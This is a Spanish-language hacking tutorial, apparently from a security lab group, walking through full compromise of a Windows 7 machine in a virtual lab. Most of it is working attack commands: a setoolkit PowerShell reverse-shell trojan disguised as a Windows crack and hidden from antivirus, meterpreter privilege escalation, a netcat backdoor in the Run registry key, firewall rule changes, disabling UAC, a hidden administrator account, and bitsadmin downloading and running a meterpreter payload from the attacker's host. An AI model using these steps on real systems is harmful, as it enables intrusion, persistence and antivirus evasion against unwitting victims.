Windows 7 Intrusin

HackLat Nogal
LabSec
 Z HackLat Nogal LabSec
Intrusin Controlada a Sistemas
Metodologa de ataque a sistemas Windows 7

Hoy en da, una intrusin la tienen bastante facil los nios en especial por el
exploit eternalblue Filtrado por "ShadowBroker" ; pero, Qu hay en un
ataque ms elaborado? Si bien, un ataque de este tipo es un tanto viejo pero
la metodologa es la misma para hacer una intrusin a un sistema informtico
Windows 7 pero bien dicen, lo bueno no significa obsoleto

Comencemos:

Que vamos hacer?

Vamos a tomar el control completo de un sistema Windows 7 con antivirus
y pondremos un backdoor para tener acceso cuando queramos

Que necesitamos?
2 maquinas virtuales: Windows 7 con antivirus y Kali Linux en la misma red

. Buscamos a la victima
Una de las opciones para buscar victimas en la red local es usar nmap, para
ello vamos a lanzarlo para ver que equipos,puertos y sistema operativos
estn en esa red local. nmap --open -O 192.168.1.0/24
 Mi vctima sera la ip 192.168.1.43 con varios puertos abiertos y por el
resultado que nos ha dado sera un Windows 7
probablemente.

Creando el payload
Usaremos la aplicacin setoolkit en Kali para realizarle un troyano
a medida para conseguir acceso al sistema.
Los parmetros sern:
1.-(1)Social-Engineering Atacks
2.-(10)Powershell Attack Vectors
3.-(1) Powershell Alphanumeric Shellcode Injector
4.- IP: 192.168.1.67 (Ip de kali) 5.-Port:
443
set> yes

Abrimos otra consola y nos dirigimos a la carpeta donde se genero con:

cd /root/.set/reports/powershell

Hacemos un ls y nos encontraremos x86_powershell_injecton.txt

Ese archivo lo copiamos a nuestro escritorio con: cp

x86_powershell_injecton.txt /root/Desktop

Ahora me lo llevare a otro equipo, en este caso sera un windows para

prepararlo.
Abrimos el archivo con el bloc de notas y lo guardamos con un nombre con
gancho, que la persona le tiente a darle en mi caso "crack_windows_7.bat"
Ahora lo transformaremos a un "fichero.exe" para ello usaremos Bat_to_exe
_converter, lo descargamos, extraemos y ejecutamos como administrador.

Cargamos el archivo bat y configuramos:

Invisible applicaton (Para que no levante sospechas por el antivirus).

Add administrator manifest (Sirve para que se ejecute con altos privilegios.)
Y en la pestaa "versioninformations" introducimos los datos del producto
fake que queramos para hacerlo mas creble
 En caso de tener antivirus activo habr que desactivarlo para que al
compilarlo no detecte el cdigo malicioso y nos fastidie el proceso.
Y ya tenemos nuestra aplicacin creada.

Este archivo es el que debemos enviar a nuestra vctima, aqu tienes

diferentes mtodos de enviarlo (por correo,descarga de un servidor
de archivos, facebook, pendrive...) y la forma que se os ocurra, esto
se denomina ingeniera social. Yo lo envi a la maquina vctima.

Ahora volvemos a nuestro metasploit que estar esperando a que sea

ejecutado el programa
Por curiosidad lo analic para ver si levanta sospechas y ves el resultado,
es invisible para los antivirus. Lo que demuestra que los antivirus son una
capa pero no la seguridad completa.

Y conseguimos ya la conexin, con una sesin de meterpreter.

 Para elevar privilegios haremos lo siguiente:

sysinfo para ver la informacion del sistema

getuid: muestra el usuario que eres

getsystem: consigue elevar privilegios a system getuid

Ahora vamos a backdoorizar el sistema:

Para esto usaremos Netcat, una herramienta excelente para abrir puertos,
asociarlo a una shell y forzar conexiones.
Abrimos otra consola y ponemos: locate windows-binaries y

hacemos cd /usr/share/windows-binaries y ls (El programa

que nos interesa es nc.exe que es el netcat)
ponemos pwd para saber la ruta que introduciremos
Y copiamos la direccin /usr/share/windows-binaries/nc.exe , y seguido
ponemos la ruta en la que se subira en este caso
lo guardaremos en System32 para poderlo llamar facilmente despus. Con el
comando upload previamente para subir el archivo.

upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32

*Esas doble barras son para que lo lea, en caso de poner una que no
traiga la barra.

Mostramos del registro que software se ejecuta al iniciar: reg enumkey -k

HKLM\\software\\microsoft\\windows\\currentversion\\run

Ahora aadimos nuestro backdoor:

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v <

nombre> -d 'C:\windows\system32\nc.exe
-d - -p 12345 -e cmd.exe'

Y comprobamos que se introdujo.

 Para ver que es lo que hace: reg queryval -k

HKLM\\software\\microsoft\\windows\\currentversion\\run -v Microsoft

Pero si hacemos un nmap vemos que el puerto 12345 an no est

abierto, pero el backdoor si que esta funcionando.

Ahora necesitamos una consola de windows asi que: shell

Lo primero es ver el estado del firewall: netsh firewall show state

 Como ves, esta encendido

Ahora vemos los puertos abiertos, pero vemos que no nos lo muestra.

***En caso de que se caiga haremos: msfcli exploit/mult/handler PAYOAD=

windows/meterpreter/reverse_tcp
lhost=192.168.1.67 lport=334 E
Y doble click en el crack para volver a tener una sesin de meterpreter.
Ahora abrimos el puerto: netsh advfirewall firewall add rule name="
microsoft update" dir=in acton=allow protocol=TCP

localport=12345

Vamos a comprobar al PC de la mquina que se realiz correctamente,

asi que entramos en el firewall en permitir un programa.....

Vemos que si ademas vemos que no somos los unicos con acceso y que
hay un Poison Ivy, que es un RAT para controlar equipos troyanizados.

Ahora desactivaremos el UAC (User Access Control), que es el que pide

permisos al administrador para poder ejecutar cualquier programa.

reg-exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\

Policies\System /v Enable UA /t REG_DWORD /d 0 /f
Para comprobarlo podemos ir navegando por el regedit y verificarlo, aqui
se puede comprender mejor el comando que introducimos antes.

Creamos un usuario de nombre y contrasea kali: net user kali kali /add

La metemos en el grupo administradores: net localgroup administradores

kali /add

Y comprobamos que se creo correctamente:

Pero no podemos dejar esa cuenta visible, asi que modificaremos el registro
para ocultarla. Usaremos la ruta HKLM\software\Microsoft/Windows

NT\CurrentVersion\Winlogon\specialaccounts "pero specialaccounts hay

que crearla: reg add"
"HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\
specialaccounts Creamos una carpeta dentro de specialaccounts llamada
userlist reg add "HKLM\software\Microsoft\Windows
NT\CurrentVersion\Winlogon\specialaccounts\userlist" Configuramos la
cuenta kali para que este oculta
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\
specialaccounts\userlist" /v kali /t
REG_DWORD /d 0 /f
 Y comprobamos como se oculto

Pero podemos ver todos los usuarios con: net user

Tambin podemos ver grficamente, inicio > botn derecho sobre equipo "
Administrar" > Usuarios y grupos locales > Usuarios
/*Necesitaramos hacer otros cambios para ocultarlo en estos sitos*/
 Ahora vamos a reiniciar a la vctima para ver si todo funciona
correctamente. Meterpreter pierde la conexin.

Una vez reiniciado veremos nuestra obra, para comprobar los cambios que
hemos hecho.
Comprobamos que el UAC esta desactivado, para ello podemos clickear en
cualquier archivo que necesite permisos de administrador para ejecutarse y
no nos saldr la ventana para aceptar.

Otra cosa interesante es probar comandos que antes tenamos con acceso
denegado y ahora nos deja como es el caso

de at, que es para ejecutar comandos a una hora determinada.

Ahora vamos a entrar por el backdoor que hemos creado.

Lo primero que hacemos es lanzar un nmap para comprobar el estado de

nuestro puerto. nmap 192.168.1.43
 Y ahora con netcat nos conectamos, nc -vv 192.168.1.43
12345

Ahora vamos a descargar una imagen de internet al ordenador de la

vctima bitsadmin
/transfer mznlabsec /download /priority normal <enlace> C:\mznlabsec.jpg

Ahora vamos a conseguir una consola de meterpreter descargandolas de

nuestro server.
Creamos un payload con msfpayload windows/meterpreter/reverse_tcp lhost
=192.168.1.67 lport=1234 X >

/var/www/shell.exe
 /*Esto lo detectara el antivirus, para esta prctica lo desactivamos*/
Lanzamos apache: service apache2 start

Creamos un trabajo al que aadiremos una o mas tareas para ejecutarlas

con posterioridad: bitsadmin /create kali

Ahora aadimos la tarea a kali_linux: bitsadmin /add le kali_linux http://192

.168.1.67/shell.exe c:\Users\shell.exe
 Y para ejecutarlo hacemos: bitsadmin /resume kali_linux

Podemos ver el estado de la ejecucin introduciendo: bitsadmin /info kali_

linux , y para verlo mas destallado
bitsadmin /info kali_linux /verbose

Otra opcin interesante con bitsadmin es ver los trabajos, para verlos
usaremos: bitsadmin /list
Y para analizar y ver el trabajo hacemos: bitsadmin /complete kali_linux

En nuestro Windows 7 ya aparece

Pues ya que esta vamos a realizar una conexion a esta shell: msfcli
exploit/mult/handler
PAYLOAD=windows/meterpreter/reverse_tcp lhost=192.168.1.67 lport=
1234 E
 Ahora desde nuestra shell de windows, nos ponemos en la ruta y
ejecutamos con: shell.exe

Y ahora ya realiza la conexion y obtenemos la shell de meterpreter

Ahora ya podemos ejecutar un getsystem y seremos los jefes del
equipo.

Agradecimientos a Mayko por la confianza y paciencia :D